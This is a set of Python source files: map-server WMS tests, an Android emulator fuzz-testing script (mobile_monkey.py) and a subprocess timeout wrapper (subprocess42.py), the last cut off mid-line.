@pytest.fixture def layer(self, mock_wms_client): source = WMSSource(mock_wms_client) return DirectMapLayer(source, GLOBAL_GEOGRAPHIC_EXTENT) def test_get_map(self, layer, mock_wms_client): result = layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png')) assert mock_wms_client.requested == [((-180, -90, 180, 90), (300, 150), SRS(4326))] assert result.size == (300, 150) def test_get_map_mercator(self, layer, mock_wms_client): result = layer.get_map(MapQuery( (-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500), SRS(900913), 'png')) assert mock_wms_client.requested == \ [((-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500), SRS(900913))] assert result.size == (500, 500) class TestDirectMapLayerWithSupportedSRS(object): @pytest.fixture def layer(self, mock_wms_client): source = WMSSource(mock_wms_client) return DirectMapLayer(source, GLOBAL_GEOGRAPHIC_EXTENT) def test_get_map(self, layer, mock_wms_client): result = layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png')) assert mock_wms_client.requested == [((-180, -90, 180, 90), (300, 150), SRS(4326))] assert result.size == (300, 150) def test_get_map_mercator(self, layer, mock_wms_client): result = layer.get_map(MapQuery( (-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500), SRS(900913), 'png')) assert mock_wms_client.requested == \ [((-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500), SRS(900913))] assert result.size == (500, 500) class MockHTTPClient(object): def __init__(self): self.requested = [] def open(self, url, data=None): self.requested.append(url) w = int(re.search(r'width=(\d+)', url, re.IGNORECASE).group(1)) h = int(re.search(r'height=(\d+)', url, re.IGNORECASE).group(1)) format = re.search(r'format=image(/|%2F)(\w+)', url, re.IGNORECASE).group(2) transparent = re.search(r'transparent=(\w+)', url, re.IGNORECASE) transparent = True if transparent and transparent.group(1).lower() == 'true' else False result = BytesIO() create_debug_img((int(w), int(h)), transparent).save(result, format=format) result.seek(0) result.headers = {'Content-type': 'image/'+format} return result @pytest.fixture def mock_http_client(): return MockHTTPClient() class TestWMSSourceTransform(object): @pytest.fixture def source(self, mock_http_client): req_template = WMS111MapRequest(url='http://localhost/service?', param={ 'format': 'image/png', 'layers': 'foo' }) client = WMSClient(req_template, http_client=mock_http_client) return WMSSource(client, supported_srs=[SRS(4326)], image_opts=ImageOptions(resampling='bilinear')) def test_get_map(self, source, mock_http_client): source.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326))) assert query_eq(mock_http_client.requested[0], "http://localhost/service?" "layers=foo&width=300&version=1.1.1&bbox=-180,-90,180,90&service=WMS" "&format=image%2Fpng&styles=&srs=EPSG%3A4326&request=GetMap&height=150") def test_get_map_transformed(self, source, mock_http_client): source.get_map(MapQuery( (556597, 4865942, 1669792, 7361866), (300, 150), SRS(900913))) assert wms_query_eq(mock_http_client.requested[0], "http://localhost/service?" "layers=foo&width=300&version=1.1.1" "&bbox=4.99999592195,39.9999980766,14.999996749,54.9999994175&service=WMS" "&format=image%2Fpng&styles=&srs=EPSG%3A4326&request=GetMap&height=450") class TestWMSSourceWithClient(object): @pytest.fixture def req_template(self): return WMS111MapRequest( url='http://%s:%d/service?' % TEST_SERVER_ADDRESS, param={'format': 'image/png', 'layers': 'foo'}, ) @pytest.fixture def client(self, req_template): return WMSClient(req_template) @pytest.fixture def source(self, client): return WMSSource(client) def test_get_map(self, source): with tmp_image((512, 512)) as img: expected_req = ({'path': r'/service?LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326&styles=' '&VERSION=1.1.1&BBOX=0.0,10.0,10.0,20.0&WIDTH=512'}, {'body': img.read(), 'headers': {'content-type': 'image/png'}}) with mock_httpd(TEST_SERVER_ADDRESS, [expected_req]): q = MapQuery((0.0, 10.0, 10.0, 20.0), (512, 512), SRS(4326)) result = source.get_map(q) assert isinstance(result, ImageSource) assert result.size == (512, 512) assert is_png(result.as_buffer(seekable=True)) assert result.as_image().size == (512, 512) def test_get_map_non_image_content_type(self, source): with tmp_image((512, 512)) as img: expected_req = ({'path': r'/service?LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326&styles=' '&VERSION=1.1.1&BBOX=0.0,10.0,10.0,20.0&WIDTH=512'}, {'body': img.read(), 'headers': {'content-type': 'text/plain'}}) with mock_httpd(TEST_SERVER_ADDRESS, [expected_req]): q = MapQuery((0.0, 10.0, 10.0, 20.0), (512, 512), SRS(4326)) try: source.get_map(q) except SourceError as e: assert 'no image returned' in e.args[0] else: assert False, 'no SourceError raised' def test_basic_auth(self, req_template, client, source): http_client = HTTPClient(req_template.url, username='foo', password='bar@') client.http_client = http_client def assert_auth(req_handler): assert 'Authorization' in req_handler.headers auth_data = req_handler.headers['Authorization'].split()[1] auth_data = base64.b64decode(auth_data.encode('utf-8')).decode('utf-8') assert auth_data == 'foo:bar@' return True expected_req = ({'path': r'/service?LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326' '&VERSION=1.1.1&BBOX=0.0,10.0,10.0,20.0&WIDTH=512&STYLES=', 'require_basic_auth': True, 'req_assert_function': assert_auth}, {'body': b'no image', 'headers': {'content-type': 'image/png'}}) with mock_httpd(TEST_SERVER_ADDRESS, [expected_req]): q = MapQuery((0.0, 10.0, 10.0, 20.0), (512, 512), SRS(4326)) source.get_map(q) TESTSERVER_URL = 'http://%s:%d' % TEST_SERVER_ADDRESS class TestWMSSource(object): @pytest.fixture def source(self, mock_http_client): req = WMS111MapRequest(url=TESTSERVER_URL + '/service?map=foo', param={'layers':'foo'}) wms = WMSClient(req, http_client=mock_http_client) return WMSSource(wms, supported_srs=[SRS(4326)], image_opts=ImageOptions(resampling='bilinear')) def test_request(self, source, mock_http_client): req = MapQuery((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326), 'png') source.get_map(req) assert len(mock_http_client.requested) == 1 assert_query_eq(mock_http_client.requested[0], TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=256&SRS=EPSG%3A4326' '&VERSION=1.1.1&BBOX=-180.0,-90.0,180.0,90.0&WIDTH=512&STYLES=') def test_transformed_request(self, source, mock_http_client): req = MapQuery((-200000, -200000, 200000, 200000), (512, 512), SRS(900913), 'png') resp = source.get_map(req) assert len(mock_http_client.requested) == 1 assert wms_query_eq(mock_http_client.requested[0], TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326' '&VERSION=1.1.1&WIDTH=512&STYLES=' '&BBOX=-1.79663056824,-1.7963362121,1.79663056824,1.7963362121') img = resp.as_image() assert img.mode in ('P', 'RGB') def test_similar_srs(self, mock_http_client): # request in 3857 and source supports only 900913 # 3857 and 900913 are equal but the client requests must use 900913 req = WMS111MapRequest(url=TESTSERVER_URL + '/service?map=foo', param={'layers':'foo', 'transparent': 'true'}) wms = WMSClient(req, http_client=mock_http_client) source = WMSSource(wms, supported_srs=[SRS(900913)], image_opts=ImageOptions(resampling='bilinear')) req = MapQuery((-200000, -200000, 200000, 200000), (512, 512), SRS(3857), 'png') source.get_map(req) assert len(mock_http_client.requested) == 1 assert_query_eq(mock_http_client.requested[0], TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A900913' '&VERSION=1.1.1&WIDTH=512&STYLES=&transparent=true' '&BBOX=-200000,-200000,200000,200000') def test_transformed_request_transparent(self, mock_http_client): req = WMS111MapRequest(url=TESTSERVER_URL + '/service?map=foo', param={'layers':'foo', 'transparent': 'true'}) wms = WMSClient(req, http_client=mock_http_client) source = WMSSource(wms, supported_srs=[SRS(4326)], image_opts=ImageOptions(resampling='bilinear')) req = MapQuery((-200000, -200000, 200000, 200000), (512, 512), SRS(900913), 'png') resp = source.get_map(req) assert len(mock_http_client.requested) == 1 assert wms_query_eq(mock_http_client.requested[0], TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng' '&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326' '&VERSION=1.1.1&WIDTH=512&STYLES=&transparent=true' '&BBOX=-1.79663056824,-1.7963362121,1.79663056824,1.7963362121') img = resp.as_image() assert img.mode in ('P', 'RGBA') img = img.convert('RGBA') assert img.getpixel((5, 5))[3] == 0 class MockLayer(object): def __init__(self): self.requested = [] def get_map(self, query): self.requested.append((query.bbox, query.size, query.srs)) @pytest.mark.parametrize('case,map_query,low_requested', [ ['low', MapQuery((0, 0, 10000, 10000), (100, 100), SRS(3857)), True], ['high', MapQuery((0, 0, 100, 100), (100, 100), SRS(3857)), False], ['match', MapQuery((0, 0, 10, 10), (100, 100), SRS(3857)), False], ['low_transform', MapQuery((0, 0, 0.1, 0.1), (100, 100), SRS(4326)), True], ['high_transform', MapQuery((0, 0, 0.005, 0.005), (100, 100), SRS(4326)), False], ]) def test_resolution_conditional_layers(case, map_query, low_requested): low = MockLayer() high = MockLayer() layer = ResolutionConditional(low, high, 10, SRS(3857), GLOBAL_GEOGRAPHIC_EXTENT) layer.get_map(map_query) assert bool(low.requested) == low_requested assert bool(high.requested) != low_requested def test_srs_conditional_layers(): l4326 = MockLayer() l900913 = MockLayer() l32632 = MockLayer() layer = SRSConditional([ (l4326, (SRS('EPSG:4326'),)), (l900913, (SRS('EPSG:900913'), SRS('EPSG:31467'))), (l32632, (SRSConditional.PROJECTED,)), ], GLOBAL_GEOGRAPHIC_EXTENT) # srs match assert layer._select_layer(SRS(4326)) == l4326 assert layer._select_layer(SRS(900913)) == l900913 assert layer._select_layer(SRS(31467)) == l900913 # type match (projected) assert layer._select_layer(SRS(31466)) == l32632 assert layer._select_layer(SRS(32633)) == l32632 # fallback is first layer assert layer._select_layer(SRS(4258)) == l4326 @pytest.mark.parametrize('case,map_query,is_direct,is_l3857,is_l4326', [ ['high_3857', MapQuery((0, 0, 100, 100), (100, 100), SRS(900913)), True, False, False], ['high_4326', MapQuery((0, 0, 0.0001, 0.0001), (100, 100), SRS(4326)), True, False, False], ['low_4326', MapQuery((0, 0, 10, 10), (100, 100), SRS(4326)), False, False, True], ['low_3857', MapQuery((0, 0, 10000, 10000), (100, 100), SRS(31467)), False, True, False], ['low_projected', MapQuery((0, 0, 10000, 10000), (100, 100), SRS(31467)), False, True, False], ]) def test_neasted_conditional_layers(case, map_query, is_direct, is_l3857, is_l4326): direct = MockLayer() l3857 = MockLayer() l4326 = MockLayer() layer = ResolutionConditional( SRSConditional([ (l3857, (SRS('EPSG:3857'),)), (l4326, (SRS('EPSG:4326'),)) ], GLOBAL_GEOGRAPHIC_EXTENT), direct, 10, SRS(3857), GLOBAL_GEOGRAPHIC_EXTENT ) layer.get_map(map_query) assert bool(direct.requested) == is_direct assert bool(l3857.requested) == is_l3857 assert bool(l4326.requested) == is_l4326
mobile_monkey.py
''' mobile monkey ''' import time from typing import List from threading import Thread import config_reader as config import emulator_manager import api_commands from telnet_connector import TelnetAdb from telnet_connector import GsmProfile from telnet_connector import NetworkDelay from telnet_connector import NetworkStatus from emulator import Emulator from fuzz_context import Fuzzer from adb_settings import Airplane, KeyboardEvent, UserRotation # import adb_settings as AdbSettings import util from adb_monkey import AdbMonkey from apk import Apk from adb_logcat import Logcat, TestType, FatalWatcher from log_analyzer import Analyzer PRINT_FLAG = True TIME_PRINT_FLAG = True emulator_model = config.EMULATOR_NAME emulator_port = config.EMULATOR_PORT contextual_events = 0 WILL_MONKEY = True def start_emulator() -> bool: ''' starts emulator ''' command = config.EMULATOR global emulator_model if emulator_manager.adb_instances_manager(): util.debug_print('already emulators are running.', flag=PRINT_FLAG) return True else: util.debug_print( str.format("No emulator instance running. starting {} at port {}", emulator_model, emulator_port), flag=PRINT_FLAG) api_commands.adb_start_server_safe() emulator_manager.emulator_start_avd(emulator_port, emulator_model) # subprocess.Popen([command, # '-port', str(emulator_port), '-avd', # emulator_name, '-use-system-libs'], # stdout=subprocess.PIPE) emulator_manager.check_avd_booted_completely(emulator_port) return True def threads_to_run(emulator: Emulator, apk: Apk, fuzz: Fuzzer, will_monkey: bool) -> List: ''' runs the threads after checking permissions. ''' threads = [] global contextual_events util.debug_print(apk.permissions, flag=PRINT_FLAG) emulator_name = 'emulator-' + emulator.port if "android.permission.INTERNET" in apk.permissions or \ "android.permission.ACCESS_NETWORK_STATE" in apk.permissions: util.debug_print("Internet permission detected", flag=PRINT_FLAG) network_delay_interval_events = fuzz.generate_step_interval_event( NetworkDelay) contextual_events += len(network_delay_interval_events) threads.append(Thread(target=fuzz.random_network_delay, args=( config.LOCALHOST, emulator, network_delay_interval_events))) network_speed_interval_event = fuzz.generate_step_interval_event( NetworkStatus) contextual_events += len(network_speed_interval_event) threads.append(Thread(target=fuzz.random_network_speed, args=( config.LOCALHOST, emulator, network_speed_interval_event))) airplane_mode_interval_events = fuzz.generate_step_interval_event( Airplane) contextual_events += len(airplane_mode_interval_events) threads.append(Thread( target=fuzz.random_airplane_mode_call, args=(emulator_name, airplane_mode_interval_events))) if "android.permission.ACCESS_NETWORK_STATE" in apk.permissions: util.debug_print("access_network_state detected", flag=PRINT_FLAG) gsm_profile_interval_events = fuzz.generate_step_uniforminterval_event( GsmProfile) contextual_events += len(gsm_profile_interval_events) threads.append(Thread(target=fuzz.random_gsm_profile, args=( config.LOCALHOST, emulator, config.UNIFORM_INTERVAL, gsm_profile_interval_events))) user_rotation_interval_events = fuzz.generate_step_interval_event( UserRotation) contextual_events += len(user_rotation_interval_events) threads.append(Thread( target=fuzz.random_rotation, args=((emulator_name, user_rotation_interval_events)))) key_event_interval_events = fuzz.generate_step_interval_event( KeyboardEvent) contextual_events += len(key_event_interval_events) threads.append(Thread( target=fuzz.random_key_event, args=((emulator_name, key_event_interval_events)))) if will_monkey: monkey = AdbMonkey(emulator, apk, config.SEED, config.DURATION) thread_monkey = Thread(target=monkey.start_monkey) threads.append(thread_monkey) return threads def run(apk: Apk, emulator_name: str, emulator_port: int): ''' runs things ''' to_kill = False to_test = True to_full_run = True wipe_after_finish = False # test_time_seconds = 30 if not start_emulator(): return emulator = emulator_manager.get_adb_instance_from_emulators(emulator_name) # emulator_name = 'emulator-' + emulator.port telnet_connector = TelnetAdb(config.LOCALHOST, emulator.port) # apk = Apk(config.APK_FULL_PATH) # api_commands.adb_uninstall_apk(emulator, apk) # api_commands.adb_install_apk(emulator, apk) # api_commands.adb_start_launcher_of_apk(emulator, apk) log = Logcat(emulator, apk, TestType.MobileMonkey) # api_commands.adb_pidof_app(emulator, apk) if to_kill: telnet_connector.kill_avd() quit() if not to_test: return log.start_logcat() fuzz = Fuzzer(config.MINIMUM_INTERVAL, config.MAXIMUM_INTERVAL, config.SEED, config.DURATION, FatalWatcher(log.file_address)) # log.experimental_start_logcat(fuzz) # fuzz.print_intervals_events() threads = threads_to_run(emulator, apk, fuzz, WILL_MONKEY) # log_thread = Thread(target=log.start, args=(fuzz,)) global contextual_events print("Total contextual events: " + str(contextual_events)) # print(threads) # return # device = AdbSettings.AdbSettings('emulator-' + adb_instance.port) # triggers = [fuzz.set_continue_network_speed, # fuzz.set_continue_gsm_profile, # fuzz.set_continue_network_delay] # thread_test = Thread(target=time_to_test, args=[ # test_time_seconds, triggers, ]) # thread_fuzz_delay = Thread(target=fuzz.random_network_delay, args=( # config.LOCALHOST, emulator.port,)) # thread_fuzz_profile = Thread(target=fuzz.random_gsm_profile, args=( # config.LOCALHOST, emulator.port, 12,)) # thread_fuzz_speed = Thread(target=fuzz.random_network_speed, args=( # config.LOCALHOST, emulator.port,)) # thread_fuzz_rotation = Thread( # target=fuzz.random_rotation, args=((emulator_name,))) # thread_fuzz_airplane = Thread( # target=fuzz.random_airplane_mode_call, args=(emulator_name,)) # monkey = AdbMonkey(emulator, config.APP_PACKAGE_NAME, # config.SEED, config.DURATION) # thread_monkey = Thread(target=monkey.start_monkey) if to_full_run: util.debug_print( "started testing at {}".format(time.ctime()), flag=TIME_PRINT_FLAG) [thread.start() for thread in threads] # log_thread.start() [thread.join() for thread in threads] # log.log_process.kill() # log.stop_logcat() # log_thread.join() # thread_monkey.start() # thread_fuzz_rotation.start() # thread_fuzz_delay.start() # thread_fuzz_profile.start() # thread_fuzz_speed.start() # thread_fuzz_airplane.start() # thread_test.start() # thread_test.join() # thread_fuzz_delay.join() # thread_fuzz_profile.join() # thread_fuzz_speed.join() # thread_fuzz_rotation.join() # thread_fuzz_airplane.join() # thread_monkey.join() # telnet_connector.kill_avd() api_commands.adb_stop_activity_of_apk(emulator, apk) log.stop_logcat() api_commands.adb_uninstall_apk(emulator, apk) util.debug_print( 'Finished testing and uninstalling app at {}'.format(time.ctime()), flag=TIME_PRINT_FLAG) print(Analyzer(log.file_address)) if wipe_after_finish: print("successfully completed testing app. Closing emulator") telnet_connector.kill_avd() emulator_manager.emulator_wipe_data(emulator) if __name__ == '__main__': run(Apk(config.APK_FULL_PATH), config.EMULATOR_NAME, config.EMULATOR_PORT)
subprocess42.py
# Copyright 2013 The LUCI Authors. All rights reserved. # Use of this source code is governed under the Apache License, Version 2.0 # that can be found in the LICENSE file. """subprocess42 is the answer to life the universe and everything. It has the particularity of having a Popen implementation that can yield output as it is produced while implementing a timeout and NOT requiring the use of worker threads. Example: Wait for a child process with a timeout, send SIGTERM, wait a grace period then send SIGKILL: def wait_terminate_then_kill(proc, timeout, grace): try: return proc.wait(timeout) except subprocess42.TimeoutExpired: proc.terminate() try: return proc.wait(grace) except subprocess42.TimeoutExpired: proc.kill() return proc.wait() TODO(maruel): Add VOID support like subprocess2. """ import collections import contextlib import errno import os import signal import sys import threading import time import subprocess from subprocess import CalledProcessError, PIPE, STDOUT # pylint: disable=W0611 from subprocess import list2cmdline # Default maxsize argument. MAX_SIZE = 16384 # Set to True when inhibit_crash_dump() has been called. _OS_ERROR_REPORTING_INHIBITED = False if subprocess.mswindows: import ctypes import msvcrt # pylint: disable=F0401 from ctypes import wintypes from ctypes import windll # Which to be received depends on how this process was called and outside the # control of this script. See Popen docstring for more details. STOP_SIGNALS = (signal.SIGBREAK, signal.SIGTERM) def ReadFile(handle, desired_bytes): """Calls kernel32.ReadFile().""" c_read = wintypes.DWORD() buff = wintypes.create_string_buffer(desired_bytes+1) windll.kernel32.ReadFile( handle, buff, desired_bytes, wintypes.byref(c_read), None) # NULL terminate it. buff[c_read.value] = '\x00' return wintypes.GetLastError(), buff.value def PeekNamedPipe(handle): """Calls kernel32.PeekNamedPipe(). Simplified version.""" c_avail = wintypes.DWORD() c_message = wintypes.DWORD() success = windll.kernel32.PeekNamedPipe( handle, None, 0, None, wintypes.byref(c_avail), wintypes.byref(c_message)) if not success: raise OSError(wintypes.GetLastError()) return c_avail.value def recv_multi_impl(conns, maxsize, timeout): """Reads from the first available pipe. It will immediately return on a closed connection, independent of timeout. Arguments: - maxsize: Maximum number of bytes to return. Defaults to MAX_SIZE. - timeout: If None, it is blocking. If 0 or above, will return None if no data is available within |timeout| seconds. Returns: tuple(int(index), str(data), bool(closed)). """ assert conns assert timeout is None or isinstance(timeout, (int, float)), timeout maxsize = max(maxsize or MAX_SIZE, 1) # TODO(maruel): Use WaitForMultipleObjects(). Python creates anonymous pipes # for proc.stdout and proc.stderr but they are implemented as named pipes on # Windows. Since named pipes are not waitable object, they can't be passed # as-is to WFMO(). So this means N times CreateEvent(), N times ReadFile() # and finally WFMO(). This requires caching the events handles in the Popen # object and remembering the pending ReadFile() calls. This will require # some re-architecture to store the relevant event handle and OVERLAPPEDIO # object in Popen or the file object. start = time.time() handles = [ (i, msvcrt.get_osfhandle(c.fileno())) for i, c in enumerate(conns) ] while True: for index, handle in handles: try: avail = min(PeekNamedPipe(handle), maxsize) if avail: return index, ReadFile(handle, avail)[1], False except OSError: # The pipe closed. return index, None, True if timeout is not None and (time.time() - start) >= timeout: return None, None, False # Polling rocks. time.sleep(0.001) else: import fcntl # pylint: disable=F0401 import select # Signals that mean this process should exit quickly. STOP_SIGNALS = (signal.SIGINT, signal.SIGTERM) def recv_multi_impl(conns, maxsize, timeout): """Reads from the first available pipe. It will immediately return on a closed connection, independent of timeout. Arguments: - maxsize: Maximum number of bytes to return. Defaults to MAX_SIZE. - timeout: If None, it is blocking. If 0 or above, will return None if no data is available within |timeout| seconds. Returns: tuple(int(index), str(data), bool(closed)). """ assert conns assert timeout is None or isinstance(timeout, (int, float)), timeout maxsize = max(maxsize or MAX_SIZE, 1) # select(timeout=0) will block, it has to be a value > 0. if timeout == 0: timeout = 0.001 try: r, _, _ = select.select(conns, [], [], timeout) except select.error: r = None if not r: return None, None, False conn = r[0] # Temporarily make it non-blocking. # TODO(maruel): This is not very efficient when the caller is doing this in # a loop. Add a mechanism to have the caller handle this. flags = fcntl.fcntl(conn, fcntl.F_GETFL) if not conn.closed: # pylint: disable=E1101 fcntl.fcntl(conn, fcntl.F_SETFL, flags | os.O_NONBLOCK) try: try: data = conn.read(maxsize) except IOError as e: # On posix, this means the read would block. if e.errno == errno.EAGAIN: return conns.index(conn), None, False raise e if not data: # On posix, this means the channel closed. return conns.index(conn), None, True return conns.index(conn), data, False finally: if not conn.closed: fcntl.fcntl(conn, fcntl.F_SETFL, flags) class TimeoutExpired(Exception): """Compatible with python3 subprocess.""" def __init__(self, cmd, timeout, output=None, stderr=None): self.cmd = cmd self.timeout = timeout self.output = output # Non-standard: self.stderr = stderr super(TimeoutExpired, self).__init__(str(self)) def __str__(self): return "Command '%s' timed out after %s seconds" % (self.cmd, self.timeout) class Popen(subprocess.Popen): """Adds timeout support on stdout and stderr. Inspired by http://code.activestate.com/recipes/440554-module-to-allow-asynchronous-subprocess-use-on-win/ Unlike subprocess, yield_any(), recv_*(), communicate() will close stdout and stderr once the child process closes them, after all the data is read. Arguments: - detached: If True, the process is created in a new process group. On Windows, use CREATE_NEW_PROCESS_GROUP. On posix, use os.setpgid(0, 0). Additional members: - start: timestamp when this process started. - end: timestamp when this process exited, as seen by this process. - detached: If True, the child process was started as a detached process. - gid: process group id, if any. - duration: time in seconds the process lasted. Additional methods: - yield_any(): yields output until the process terminates. - recv_any(): reads from stdout and/or stderr with optional timeout. - recv_out() & recv_err(): specialized version of recv_any(). """ # subprocess.Popen.__init__() is not threadsafe; there is a race between # creating the exec-error pipe for the child and setting it to CLOEXEC during # which another thread can fork and cause the pipe to be inherited by its # descendents, which will cause the current Popen to hang until all those # descendents exit. Protect this with a lock so that only one fork/exec can # happen at a time. popen_lock = threading.Lock() def __init__(self, args, **kwargs): assert 'creationflags' not in kwargs assert 'preexec_fn' not in kwargs, 'Use detached=True instead' self.start = time.time() self.end = None self.gid = None self.detached = kwargs.pop('detached', False) if self.detached: if subprocess.mswindows: kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP else: kwargs['preexec_fn'] = lambda: os.setpgid(0, 0) with self.popen_lock: super(Popen, self).__init__(args, **kwargs) self.args = args if self.detached and not subprocess.mswindows: try: self.gid = os.getpgid(self.pid) except OSError: # sometimes the process can run+finish before we collect its pgid. fun. pass def duration(self): """Duration of the child process. It is greater or equal to the actual time the child process ran. It can be significantly higher than the real value if neither .wait() nor .poll() was used. """ return (self.end or time.time()) - self.start # pylint: disable=arguments-differ,redefined-builtin def communicate(self, input=None, timeout=None): """Implements python3's timeout support. Unlike wait(), timeout=0 is considered the same as None. Raises: - TimeoutExpired when more than timeout seconds were spent waiting for the process. """ if not timeout: return super(Popen, self).communicate(input=input) assert isinstance(timeout, (int, float)), timeout if self.stdin or self.stdout or self.stderr: stdout = '' if self.stdout else None stderr = '' if self.stderr else None t = None if input is not None: assert self.stdin, ( 'Can\'t use communicate(input) if not using ' 'Popen(stdin=subprocess42.PIPE') # TODO(maruel): Switch back to non-threading. def write(): try: self.stdin.write(input) except IOError: pass t = threading.Thread(name='Popen.communicate', target=write) t.daemon = True t.start() try: if self.stdout or self.stderr: start = time.time() end = start + timeout def remaining(): return max(end - time.time(), 0) for pipe, data in self.yield_any(timeout=remaining): if pipe is None: raise TimeoutExpired(self.args, timeout, stdout, stderr) assert pipe in ('stdout', 'stderr'), pipe if pipe == 'stdout': stdout += data else: stderr += data else: # Only stdin is piped. self.wait(timeout=timeout) finally: if t: try: self.stdin.close() except IOError: pass t.join() else: # No pipe. The user wanted to use wait(). self.wait(timeout=timeout) return None, None # Indirectly initialize self.end. self.wait() return stdout, stderr def wait(self, timeout=None): # pylint: disable=arguments-differ """Implements python3's timeout support. Raises: - TimeoutExpired when more than timeout seconds were spent waiting for the process. """ assert timeout is None or isinstance(timeout, (int, float)), timeout if timeout is None: super(Popen, self).wait() elif self.returncode is None: if subprocess.mswindows: WAIT_TIMEOUT = 258 result = subprocess._subprocess.WaitForSingleObject( self._handle, int(timeout * 1000)) if result == WAIT_TIMEOUT: raise TimeoutExpired(self.args, timeout) self.returncode = subprocess._subprocess.GetExitCodeProcess( self._handle) else: # If you think the following code is horrible, it's because it is # inspired by python3's stdlib. end = time.time() + timeout delay = 0.001 while True: try: pid, sts = subprocess._eintr_retry_call( os.waitpid, self.pid, os.WNOHANG) except OSError as e: if e.errno != errno.ECHILD: raise pid = self.pid sts = 0 if pid == self.pid: # This sets self.returncode. self._handle_exitstatus(sts) break remaining = end - time.time() if remaining <= 0: raise TimeoutExpired(self.args, timeout) delay = min(delay * 2, remaining, .05) time.sleep(delay) if not self.end: # communicate() uses wait() internally. self.end = time.time() return self.returncode def poll(self): ret = super(Popen, self).poll() if ret is not None and not self.end: self.end = time.time() return ret def yield_any_line(self, **kwargs): """Yields lines until the process terminates. Like yield_any, but yields lines. """ return split(self.yield_any(**kwargs)) def yield_any(self, maxsize=None, timeout=None): """Yields output until the process terminates. Unlike wait(), does not raise TimeoutExpired. Yields: (pipename, data) where pipename is either 'stdout', 'stderr' or None in case of timeout or when the child process closed one of the pipe(s) and all pending data on the pipe was read. Arguments: - maxsize: See recv_any(). Can be a callable function. - timeout: If None, the call is blocking. If set, yields None, None if no data is available within |timeout| seconds. It resets itself after each yield. Can be a callable function. """ assert self.stdout or self.stderr if timeout is not None: # timeout=0 effectively means that the pipe is continuously polled. if isinstance(timeout, (int, float)): assert timeout >= 0, timeout old_timeout = timeout timeout = lambda: old_timeout else: assert callable(timeout), timeout if maxsize is not None and not callable(maxsize): assert isinstance(maxsize, (int, float)), maxsize last_yield = time.time() while self.poll() is None: to = timeout() if timeout else None if to is not None: to = max(to - (time.time() - last_yield), 0) t, data = self.recv_any( maxsize=maxsize() if callable(maxsize) else maxsize, timeout=to) if data or to is 0: yield t, data last_yield = time.time() # Read all remaining output in the pipes. # There is 3 cases: # - pipes get closed automatically by the calling process before it exits # - pipes are closed automated by the OS # - pipes are kept open due to grand-children processes outliving the # children process. while True: ms = maxsize if callable(maxsize): ms = maxsize() # timeout=0 is mainly to handle the case where a grand-children process # outlives the process started. t, data = self.recv_any(maxsize=ms, timeout=0) if not data: break yield t, data def recv_any(self, maxsize=None, timeout=None): """Reads from the first pipe available from stdout and stderr. Unlike wait(), does not throw TimeoutExpired. Arguments: - maxsize: Maximum number of bytes to return. Defaults to MAX_SIZE. - timeout: If None, it is blocking. If 0 or above, will return None if no data is available within |timeout| seconds. Returns: tuple(pipename or None, str(data)). pipename is one of 'stdout' or 'stderr'. """ # recv_multi_impl will early exit on a closed connection. Loop accordingly # to simplify call sites. while True: pipes = [ x for x in ((self.stderr, 'stderr'), (self.stdout, 'stdout')) if x[0] ] # If both stdout and stderr have the exact file handle, they are # effectively the same pipe. Deduplicate it since otherwise it confuses # recv_multi_impl(). if len(pipes) == 2 and self.stderr.fileno() == self.stdout.fileno(): pipes.pop(0) if not pipes: return None, None start = time.time() conns, names = zip(*pipes) index, data, closed = recv_multi_impl(conns, maxsize, timeout) if index is None: return index, data if closed: self._close(names[index]) if not data: # Loop again. The other pipe may still be open. if timeout: timeout -= (time.time() - start) continue if self.universal_newlines and data: data = self._translate_newlines(data) return names[index], data def recv_out(self, maxsize=None, timeout=None): """Reads from stdout synchronously with timeout.""" return self._recv('stdout', maxsize, timeout) def recv_err(self, maxsize=None, timeout=None): """Reads from stderr synchronously with timeout.""" return self._recv('stderr', maxsize, timeout) def terminate(self): """Tries to do something saner on Windows that the stdlib. Windows: self.detached/CREATE_NEW_PROCESS_GROUP determines what can be used: - If set, only SIGBREAK can be sent and it is sent to a single process. - If not set, in theory only SIGINT can be used and *all processes* in the processgroup receive it. In practice, we just kill the process. See http://msdn.microsoft.com/library/windows/desktop/ms683155.aspx The default on Windows is to call TerminateProcess() always, which is not useful. On Posix, always send SIGTERM. """ try: if subprocess.mswindows and self.detached: return self.send_signal(signal.CTRL_BREAK_EVENT) super(Popen, self).terminate() except OSError: # The function will throw if the process terminated in-between. Swallow # this. pass def kill(self): """Kills the process and its children if possible. Swallows exceptions and return True on success. """ if self.gid: try: os.killpg(self.gid, signal.SIGKILL) except OSError: return False else: try: super(Popen, self).kill() except OSError: return False return True def _close(self, which): """Closes either stdout or stderr.""" getattr(self, which).close() setattr(self, which, None) def _recv(self, which, maxsize, timeout): """Reads from one of stdout or stderr synchronously with timeout.""" conn = getattr(self, which) if conn is None: return None _, data, closed = recv_multi_impl([conn], maxsize, timeout) if closed: self._close(which) if self.universal_newlines and data: data = self._translate_newlines(data) return data @contextlib.contextmanager def set_signal_handler(signals, handler): """Temporarilly override signals handler. Useful when waiting for a child process to handle signals like SIGTERM, so the signal can be propagated to the child process. """ previous = {s: signal.signal(s, 